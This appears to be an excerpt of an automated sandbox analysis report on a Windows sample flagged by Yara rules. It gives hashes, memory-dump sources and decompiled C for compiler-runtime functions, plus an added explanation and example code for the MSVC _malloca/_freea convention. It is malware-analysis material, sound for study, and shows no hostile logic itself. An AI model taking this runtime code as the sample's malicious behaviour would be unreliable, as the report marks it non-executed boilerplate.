
            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction ID: 7a2edfa98ed5f9484cf9d60ca4dce4610025f8788a1c1028a681dd39cb703040
            • Opcode Fuzzy Hash: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction Fuzzy Hash: 24119376504280DFCF15CF14D5C4B16BF71FB94324F24C6A9D8494B656C336D856CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000A.00000002.683939568.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction ID: 8bc4d8239bceacb3a0b6b40637ebe4939650f36a80dbb211a4880d0d9c2648d1
            • Opcode Fuzzy Hash: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction Fuzzy Hash: 01118B75904280DFCB21CF10D5C4B59FBA1FB84324F24C6AEDC494B656C33AD85ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b1eb4b6773046cbdb90af58d419403b052d887efd6cdbe5caf7902a638d1041f
            • Instruction ID: 3bc4996b15d2e8d47aa2f944ab3e9b5c37304d43a81286c8943be185d5bf3cfc
            • Opcode Fuzzy Hash: b1eb4b6773046cbdb90af58d419403b052d887efd6cdbe5caf7902a638d1041f
            • Instruction Fuzzy Hash: 0501DBB550C3809AE7104F25CCC4BA7FBD8EFD1364F18C55AED465B246C3799846C6B1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1de67c919d6b917e184169b105a5f0ec42fee8d9d650ea248e0ae877f3ec3800
            • Instruction ID: acdd4434ae6390c87418bf3b9cec151caf90f99287c0f3bf028205bc4915308e
            • Opcode Fuzzy Hash: 1de67c919d6b917e184169b105a5f0ec42fee8d9d650ea248e0ae877f3ec3800
            • Instruction Fuzzy Hash: 20F062B1408384AEE7108F15CCC4B62FB98EB91724F18C55AED495B686C3799845CAB1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 70%
            			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
            				signed int _v8;
            				int _v12;
            				void* _v24;
            				signed int _t49;
            				signed int _t54;
            				int _t56;
            				signed int _t58;
            				short* _t60;
            				signed int _t64;
            				short* _t68;
            				int _t76;
            				short* _t79;
            				signed int _t85;
            				signed int _t88;
            				void* _t93;
            				void* _t94;
            				int _t96;
            				short* _t99;
            				int _t101;
            				int _t103;
            				signed int _t104;
            				short* _t105;
            				void* _t108;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t49 =  *0x412014; // 0x64572fa4
            				_v8 = _t49 ^ _t104;
            				_t101 = _a20;
            				if(_t101 > 0) {
            					_t76 = E004080D8(_a16, _t101);
            					_t108 = _t76 - _t101;
            					_t4 = _t76 + 1; // 0x1
            					_t101 = _t4;
            					if(_t108 >= 0) {
            						_t101 = _t76;
            					}
            				}
            				_t96 = _a32;
            				if(_t96 == 0) {
            					_t96 =  *( *_a4 + 8);
            					_a32 = _t96;
            				}
            				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
            				_v12 = _t54;
            				if(_t54 == 0) {
            					L38:
            					E004018CC();
            					return _t54;
            				} else {
            					_t93 = _t54 + _t54;
            					_t83 = _t93 + 8;
            					asm("sbb eax, eax");
            					if((_t93 + 0x00000008 & _t54) == 0) {
            						_t79 = 0;
            						__eflags = 0;
            						L14:
            						if(_t79 == 0) {
            							L36:
            							_t103 = 0;
            							L37:
            							E004063D5(_t79);
            							_t54 = _t103;
            							goto L38;
            						}
            						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
            						_t119 = _t56;
            						if(_t56 == 0) {
            							goto L36;
            						}
            						_t98 = _v12;
            						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
            						_t103 = _t58;
            						if(_t103 == 0) {
            							goto L36;
            						}
            						if((_a12 & 0x00000400) == 0) {
            							_t94 = _t103 + _t103;
            							_t85 = _t94 + 8;
            							__eflags = _t94 - _t85;
            							asm("sbb eax, eax");
            							__eflags = _t85 & _t58;
            							if((_t85 & _t58) == 0) {
            								_t99 = 0;
            								__eflags = 0;
            								L30:
            								__eflags = _t99;
            								if(__eflags == 0) {
            									L35:
            									E004063D5(_t99);
            									goto L36;
            								}
            								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
            								__eflags = _t60;
            								if(_t60 == 0) {
            									goto L35;
            								}
            								_push(0);
            								_push(0);
            								__eflags = _a28;
            								if(_a28 != 0) {
            									_push(_a28);
            									_push(_a24);
            								} else {
            									_push(0);
            									_push(0);
            								}
            								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
            								__eflags = _t103;
            								if(_t103 != 0) {
            									E004063D5(_t99);
            									goto L37;
            								} else {
            									goto L35;
            								}
            							}
            							_t88 = _t94 + 8;
            							__eflags = _t94 - _t88;
            							asm("sbb eax, eax");
            							_t64 = _t58 & _t88;
            							_t85 = _t94 + 8;
            							__eflags = _t64 - 0x400;
            							if(_t64 > 0x400) {
            								__eflags = _t94 - _t85;
            								asm("sbb eax, eax");
            								_t99 = E00403E3D(_t85, _t64 & _t85);
            								_pop(_t85);
            								__eflags = _t99;
            								if(_t99 == 0) {
            									goto L35;
            								}
            								 *_t99 = 0xdddd;
            								L28:
            								_t99 =  &(_t99[4]);
            								goto L30;
            							}
            							__eflags = _t94 - _t85;
            							asm("sbb eax, eax");
            							E004018E0();
            							_t99 = _t105;
            							__eflags = _t99;
            							if(_t99 == 0) {
            								goto L35;
            							}
            							 *_t99 = 0xcccc;
            							goto L28;
            						}
            						_t68 = _a28;
            						if(_t68 == 0) {
            							goto L37;
            						}
            						_t123 = _t103 - _t68;
            						if(_t103 > _t68) {
            							goto L36;
            						}
            						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
            						if(_t103 != 0) {
            							goto L37;
            						}
            						goto L36;
            					}
            					asm("sbb eax, eax");
            					_t70 = _t54 & _t93 + 0x00000008;
            					_t83 = _t93 + 8;
            					if((_t54 & _t93 + 0x00000008) > 0x400) {
            						__eflags = _t93 - _t83;
            						asm("sbb eax, eax");
            						_t79 = E00403E3D(_t83, _t70 & _t83);
            						_pop(_t83);
            						__eflags = _t79;
            						if(__eflags == 0) {
            							goto L36;
            						}
            						 *_t79 = 0xdddd;
            						L12:
            						_t79 =  &(_t79[4]);
            						goto L14;
            					}
            					asm("sbb eax, eax");
            					E004018E0();
            					_t79 = _t105;
            					if(_t79 == 0) {
            						goto L36;
            					}
            					 *_t79 = 0xcccc;
            					goto L12;
            				}
            			}

            Address column (one entry per C line above): 0x004078d4 to 0x00407ae4

            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
            • __alloca_probe_16.LIBCMT ref: 00407961
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
            • __alloca_probe_16.LIBCMT ref: 00407A46
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
            • __freea.LIBCMT ref: 00407AB6
              • Part of subcall function 00403E3D: HeapAlloc.KERNEL32(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            • __freea.LIBCMT ref: 00407ABF
            • __freea.LIBCMT ref: 00407AE4
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
            • String ID:
            • API String ID: 2597970681-0
            • Opcode ID: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
            • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
            • Opcode Fuzzy Hash: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
            • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
            Uniqueness

            Uniqueness Score: -1.00%
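The `*_t79 = 0xdddd; _t79 = &(_t79[4]);` and `*_t79 = 0xcccc;` pairs in E004078CF, together with the `> 0x400` size test, the `__alloca_probe_16` calls and the three `__freea` calls, are the MSVC CRT `_malloca`/`_freea` convention: a request whose padded size is at most 1024 bytes is carved from the stack and tagged 0xCCCC, a larger one comes from the heap (E00403E3D wraps HeapAlloc, per the API list) and is tagged 0xDDDD, the caller gets the block 8 bytes past the marker (four `short`s), and `__freea` reads the marker back to decide whether anything has to be released. The `sbb eax, eax` followed by an `and` before each allocation zeroes the size when adding the 8-byte marker slot carried, so a wrapped size produces NULL rather than an undersized block. The routine as a whole has the shape of the CRT's `__crtLCMapStringA` (ANSI to wide with `MB_PRECOMPOSED | MB_ERR_INVALID_CHARS` when the last argument is set, a mapping call through E00405989, then wide back to ANSI unless flag 0x400, LCMAP_SORTKEY, was requested), which is why it sits under "Non-executed Functions": it is compiler runtime, not sample logic. The C below is an added illustration of that marker convention, not code from the sample or from the CRT sources; every name in it is this example's own, and because `alloca` storage cannot outlive the function that made it, the small path takes a caller-supplied stack buffer instead.

```c
/* Added example (not from the sample): the MSVC CRT _malloca/_freea marker
 * convention as it appears in E004078CF. Names here are this example's own. */
#include <stdint.h>
#include <stdlib.h>

#define STACK_MARKER   0xCCCCu   /* written before a block taken with alloca */
#define HEAP_MARKER    0xDDDDu   /* written before a block taken from the heap */
#define MARKER_SIZE    8u        /* x86 marker slot; the listing's &buf[4] on a short* */
#define HEAP_THRESHOLD 0x400u    /* padded requests above 1024 bytes go to the heap */

/* Bytes the routine really asks for: wchar_count * 2 plus the marker slot.
 * Returns 0 when the addition would wrap; the original gets the same effect
 * from "add / sbb eax,eax / and", which zeroes the size when the add carried. */
static size_t padded_size(size_t wchar_count)
{
    if (wchar_count > (SIZE_MAX - MARKER_SIZE) / 2)
        return 0;
    return wchar_count * 2 + MARKER_SIZE;
}

/* The marker the allocation path writes for a padded request. */
static unsigned choose_marker(size_t padded)
{
    return padded > HEAP_THRESHOLD ? HEAP_MARKER : STACK_MARKER;
}

/* _malloca-style allocation. alloca cannot survive a return, so the caller
 * passes the stack storage (stack_buf/stack_len) used for the small path. */
static void *malloca_demo(size_t padded, void *stack_buf, size_t stack_len)
{
    uint16_t *block;

    if (padded == 0)                      /* overflowed size: hand back NULL */
        return NULL;
    if (choose_marker(padded) == HEAP_MARKER) {
        block = malloc(padded);           /* HeapAlloc in the sample */
        if (block == NULL)
            return NULL;
        block[0] = HEAP_MARKER;           /* *_t79 = 0xdddd */
    } else {
        if (stack_len < padded)
            return NULL;
        block = stack_buf;                /* __alloca_probe_16 + sub esp in the sample */
        block[0] = STACK_MARKER;          /* *_t79 = 0xcccc */
    }
    return (char *)block + MARKER_SIZE;   /* _t79 = &(_t79[4]) */
}

/* What __freea does: step back to the marker, free only heap blocks.
 * Returns 1 if heap memory was released, 0 for stack blocks or NULL. */
static int freea_demo(void *p)
{
    uint16_t *block;

    if (p == NULL)
        return 0;
    block = (uint16_t *)((char *)p - MARKER_SIZE);
    if (block[0] == HEAP_MARKER) {
        free(block);
        return 1;
    }
    return 0;
}

/* Read the marker of a live block; handy when checking a dump by hand. */
static unsigned marker_of(const void *p)
{
    return *(const uint16_t *)((const char *)p - MARKER_SIZE);
}

int main(void)
{
    uint16_t stack_storage[64];           /* 128 bytes of caller-owned stack */
    void *small = malloca_demo(padded_size(40), stack_storage, sizeof stack_storage);
    void *large = malloca_demo(padded_size(600), stack_storage, sizeof stack_storage);

    if (small == NULL || marker_of(small) != STACK_MARKER)
        return 1;
    if (large == NULL || marker_of(large) != HEAP_MARKER)
        return 2;
    freea_demo(small);                    /* no-op: stack block */
    freea_demo(large);                    /* free(): heap block */
    return 0;
}
```

When reading a dump of such a block, the 0xCCCC or 0xDDDD word immediately before the wide-character buffer is the fastest way to tell whether the buffer lived on the stack or the heap, and a mismatch between the marker and the free path (an 0xDDDD block never reaching HeapFree, or 0xCCCC being passed to it) is the bug to look for when a CRT wrapper like this one misbehaves.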

            C-Code - Quality: 72%
            			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
            				signed int _v8;
            				signed char _v15;
            				char _v16;
            				void _v24;
            				short _v28;
            				char _v31;
            				void _v32;
            				long _v36;
            				intOrPtr _v40;
            				void* _v44;
            				signed int _v48;
            				signed char* _v52;
            				long _v56;
            				int _v60;
            				void* __ebx;
            				signed int _t78;
            				signed int _t80;
            				int _t86;
            				void* _t93;
            				long _t96;
            				void _t104;
            				void* _t111;
            				signed int _t115;
            				signed int _t118;
            				signed char _t123;
            				signed char _t128;
            				intOrPtr _t129;
            				signed int _t131;
            				signed char* _t133;
            				intOrPtr* _t136;
            				signed int _t138;
            				void* _t139;
            
            				_t78 =  *0x412014; // 0x64572fa4
            				_v8 = _t78 ^ _t138;
            				_t80 = _a8;
            				_t118 = _t80 >> 6;
            				_t115 = (_t80 & 0x0000003f) * 0x30;
            				_t133 = _a12;
            				_v52 = _t133;
            				_v48 = _t118;
            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
            				_v40 = _a16 + _t133;
            				_t86 = GetConsoleCP();
            				_t136 = _a4;
            				_v60 = _t86;
            				 *_t136 = 0;
            				 *((intOrPtr*)(_t136 + 4)) = 0;
            				 *((intOrPtr*)(_t136 + 8)) = 0;
            				while(_t133 < _v40) {
            					_v28 = 0;
            					_v31 =  *_t133;
            					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
            					_t123 =  *(_t129 + _t115 + 0x2d);
            					if((_t123 & 0x00000004) == 0) {
            						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
            							_push(1);
            							_push(_t133);
            							goto L8;
            						} else {
            							if(_t133 >= _v40) {
            								_t131 = _v48;
            								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
            								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
            								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
            							} else {
            								_t111 = E00407222( &_v28, _t133, 2);
            								_t139 = _t139 + 0xc;
            								if(_t111 != 0xffffffff) {
            									_t133 =  &(_t133[1]);
            									goto L9;
            								}
            							}
            						}
            					} else {
            						_t128 = _t123 & 0x000000fb;
            						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
            						_push(2);
            						_v15 = _t128;
            						 *(_t129 + _t115 + 0x2d) = _t128;
            						_push( &_v16);
            						L8:
            						_push( &_v28);
            						_t93 = E00407222();
            						_t139 = _t139 + 0xc;
            						if(_t93 != 0xffffffff) {
            							L9:
            							_t133 =  &(_t133[1]);
            							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
            							_v56 = _t96;
            							if(_t96 != 0) {
            								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
            									L19:
            									 *_t136 = GetLastError();
            								} else {
            									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
            									if(_v36 >= _v56) {
            										if(_v31 != 0xa) {
            											goto L16;
            										} else {
            											_t104 = 0xd;
            											_v32 = _t104;
            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
            												goto L19;
            											} else {
            												if(_v36 >= 1) {
            													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
            													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
            													goto L16;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            					goto L20;
            					L16:
            				}
            				L20:
            				E004018CC();
            				return _t136;
            			}

            Address column (one entry per C line above): 0x0040822b to 0x004083d5

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
            • __fassign.LIBCMT ref: 004082E0
            • __fassign.LIBCMT ref: 004082FB
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
            • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
            • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
            • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 27%
            			E00403632(void* __ecx, intOrPtr _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _t10;
            				int _t12;
            				int _t18;
            				signed int _t20;
            
            				_t10 =  *0x412014; // 0x64572fa4
            				_v8 = _t10 ^ _t20;
            				_v12 = _v12 & 0x00000000;
            				_t12 =  &_v12;
            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
            				if(_t12 != 0) {
            					_t12 = GetProcAddress(_v12, "CorExitProcess");
            					_t18 = _t12;
            					if(_t18 != 0) {
            						E0040C15C();
            						_t12 =  *_t18(_a4);
            					}
            				}
            				if(_v12 != 0) {
            					_t12 = FreeLibrary(_v12);
            				}
            				E004018CC();
            				return _t12;
            			}

            Address column (one entry per C line above): 0x00403639 to 0x0040369b

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
            • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
            Strings
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
            • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

            C-Code - Quality: 79%
            			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
            				signed int _v8;
            				int _v12;
            				char _v16;
            				intOrPtr _v24;
            				char _v28;
            				void* _v40;
            				void* __ebx;
            				void* __edi;
            				signed int _t34;
            				signed int _t40;
            				int _t45;
            				int _t52;
            				void* _t53;
            				void* _t55;
            				int _t57;
            				signed int _t63;
            				int _t67;
            				short* _t71;
            				signed int _t72;
            				short* _t73;
            
            				_t34 =  *0x412014; // 0x64572fa4
            				_v8 = _t34 ^ _t72;
            				_push(_t53);
            				E00403F2B(_t53,  &_v28, __edx, _a4);
            				_t57 = _a24;
            				if(_t57 == 0) {
            					_t52 =  *(_v24 + 8);
            					_t57 = _t52;
            					_a24 = _t52;
            				}
            				_t67 = 0;
            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
            				_v12 = _t40;
            				if(_t40 == 0) {
            					L15:
            					if(_v16 != 0) {
            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
            					}
            					E004018CC();
            					return _t67;
            				}
            				_t55 = _t40 + _t40;
            				_t17 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				if((_t17 & _t40) == 0) {
            					_t71 = 0;
            					L11:
            					if(_t71 != 0) {
            						E00402460(_t67, _t71, _t67, _t55);
            						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
            						if(_t45 != 0) {
            							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
            						}
            					}
            					L14:
            					E004063D5(_t71);
            					goto L15;
            				}
            				_t20 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				_t47 = _t40 & _t20;
            				_t21 = _t55 + 8; // 0x8
            				_t63 = _t21;
            				if((_t40 & _t20) > 0x400) {
            					asm("sbb eax, eax");
            					_t71 = E00403E3D(_t63, _t47 & _t63);
            					if(_t71 == 0) {
            						goto L14;
            					}
            					 *_t71 = 0xdddd;
            					L9:
            					_t71 =  &(_t71[4]);
            					goto L11;
            				}
            				asm("sbb eax, eax");
            				E004018E0();
            				_t71 = _t73;
            				if(_t71 == 0) {
            					goto L14;
            				}
            				 *_t71 = 0xcccc;
            				goto L9;
            			}

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
            • __alloca_probe_16.LIBCMT ref: 0040633D
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
            • __freea.LIBCMT ref: 004063A9
              • Part of subcall function 00403E3D: HeapAlloc.KERNEL32(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp
            Similarity
            • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
            • String ID:
            • API String ID: 1857427562-0
            • Opcode ID: 873a1175eb618a40616ab7a4e8bd2257b42cf29e220077db7476c7961ea7fc02
            • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
            • Opcode Fuzzy Hash: 873a1175eb618a40616ab7a4e8bd2257b42cf29e220077db7476c7961ea7fc02
            • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

            C-Code - Quality: 95%
            			E00405751(signed int _a4) {
            				signed int _t9;
            				void* _t13;
            				signed int _t15;
            				WCHAR* _t22;
            				signed int _t24;
            				signed int* _t25;
            				void* _t27;
            
            				_t9 = _a4;
            				_t25 = 0x412fc8 + _t9 * 4;
            				_t24 =  *_t25;
            				if(_t24 == 0) {
            					_t22 =  *(0x40cd48 + _t9 * 4);
            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
            					if(_t27 != 0) {
            						L8:
            						 *_t25 = _t27;
            						if( *_t25 != 0) {
            							FreeLibrary(_t27);
            						}
            						_t13 = _t27;
            						L11:
            						return _t13;
            					}
            					_t15 = GetLastError();
            					if(_t15 != 0x57) {
            						_t27 = 0;
            					} else {
            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
            						_t27 = _t15;
            					}
            					if(_t27 != 0) {
            						goto L8;
            					} else {
            						 *_t25 = _t15 | 0xffffffff;
            						_t13 = 0;
            						goto L11;
            					}
            				}
            				_t4 = _t24 + 1; // 0x64572fa5
            				asm("sbb eax, eax");
            				return  ~_t4 & _t24;
            			}

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
            • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
            • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

            C-Code - Quality: 71%
            			E00404320(void* __ebx, void* __ecx, void* __edx) {
            				void* __edi;
            				void* __esi;
            				intOrPtr _t2;
            				void* _t3;
            				void* _t4;
            				intOrPtr _t9;
            				void* _t11;
            				void* _t20;
            				void* _t21;
            				void* _t23;
            				void* _t25;
            				void* _t27;
            				void* _t29;
            				void* _t31;
            				void* _t32;
            				long _t36;
            				long _t37;
            				void* _t40;
            
            				_t29 = __edx;
            				_t23 = __ecx;
            				_t20 = __ebx;
            				_t36 = GetLastError();
            				_t2 =  *0x412064; // 0xffffffff
            				_t42 = _t2 - 0xffffffff;
            				if(_t2 == 0xffffffff) {
            					L2:
            					_t3 = E00403ECE(_t23, 1, 0x364);
            					_t31 = _t3;
            					_pop(_t25);
            					if(_t31 != 0) {
            						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
            						__eflags = _t4;
            						if(_t4 != 0) {
            							E00404192(_t25, _t31, 0x4132a4);
            							E00403E03(0);
            							_t40 = _t40 + 0xc;
            							__eflags = _t31;
            							if(_t31 == 0) {
            								goto L9;
            							} else {
            								goto L8;
            							}
            						} else {
            							_push(_t31);
            							goto L4;
            						}
            					} else {
            						_push(_t3);
            						L4:
            						E00403E03();
            						_pop(_t25);
            						L9:
            						SetLastError(_t36);
            						E00403E8B(_t20, _t29, _t31, _t36);
            						asm("int3");
            						_push(_t20);
            						_push(_t36);
            						_push(_t31);
            						_t37 = GetLastError();
            						_t21 = 0;
            						_t9 =  *0x412064; // 0xffffffff
            						_t45 = _t9 - 0xffffffff;
            						if(_t9 == 0xffffffff) {
            							L12:
            							_t32 = E00403ECE(_t25, 1, 0x364);
            							_pop(_t27);
            							if(_t32 != 0) {
            								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
            								__eflags = _t11;
            								if(_t11 != 0) {
            									E00404192(_t27, _t32, 0x4132a4);
            									E00403E03(_t21);
            									__eflags = _t32;
            									if(_t32 != 0) {
            										goto L19;
            									} else {
            										goto L18;
            									}
            								} else {
            									_push(_t32);
            									goto L14;
            								}
            							} else {
            								_push(_t21);
            								L14:
            								E00403E03();
            								L18:
            								SetLastError(_t37);
            							}
            						} else {
            							_t32 = E00405878(_t25, _t45, _t9);
            							if(_t32 != 0) {
            								L19:
            								SetLastError(_t37);
            								_t21 = _t32;
            							} else {
            								goto L12;
            							}
            						}
            						return _t21;
            					}
            				} else {
            					_t31 = E00405878(_t23, _t42, _t2);
            					if(_t31 != 0) {
            						L8:
            						SetLastError(_t36);
            						return _t31;
            					} else {
            						goto L2;
            					}
